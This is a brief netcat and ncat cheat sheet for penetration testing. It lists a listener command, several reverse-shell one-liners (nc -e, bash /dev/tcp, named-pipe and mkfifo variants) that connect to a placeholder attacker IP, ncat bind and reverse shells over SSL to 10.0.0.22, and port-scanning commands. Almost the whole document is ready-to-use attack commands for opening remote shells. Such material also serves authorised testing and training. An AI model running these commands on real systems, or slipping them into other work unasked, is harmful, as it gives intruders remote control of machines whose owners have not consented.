Netcat

nc -lvnp <port-to-listen-on>

  -l   Listen for an incoming connection
  -v   Verbose
  -n   No DNS: do not resolve hostnames via DNS
  -p   Source port; combined with -l, the port to listen on

Connect to nc listener (netcat traditional method)

nc -e /bin/sh <attacker IP> <listener port>

Connect to nc listener (/dev/tcp method)

bash -i >& /dev/tcp/<attacker IP>/<listener port> 0>&1

No -e and no /dev/tcp available

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe |nc <attacker ip> <listener port> 1>/tmp/backpipe

Most reliable method

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f

Check whether the netcat on a server is the traditional build (only netcat-traditional supports the -e option)

nc -e /bin/sh

Using ncat instead

Set up a bind shell

ncat -e /bin/bash -lvnp 4444 --ssl

Connect to the ncat bind shell

ncat -v 10.0.0.22 4444 --ssl

Set up a reverse shell listener

ncat -lvnp 1337 --ssl

Connect back to the listener with a reverse shell (the port must match the listener, 1337 here)

ncat -e /bin/bash -v 10.0.0.22 1337 --ssl

Scanning with netcat

nc -zv <ip> <port>

  -z   Zero I/O mode (used for scanning: connect, report, and close without sending data)

Other Uses

Netcat TCP port scanner

  • TCP connect scan
  • completes the full three-way handshake, so it is logged like any normal connection

Netcat UDP port scanner

  • the -u flag specifies a UDP scan
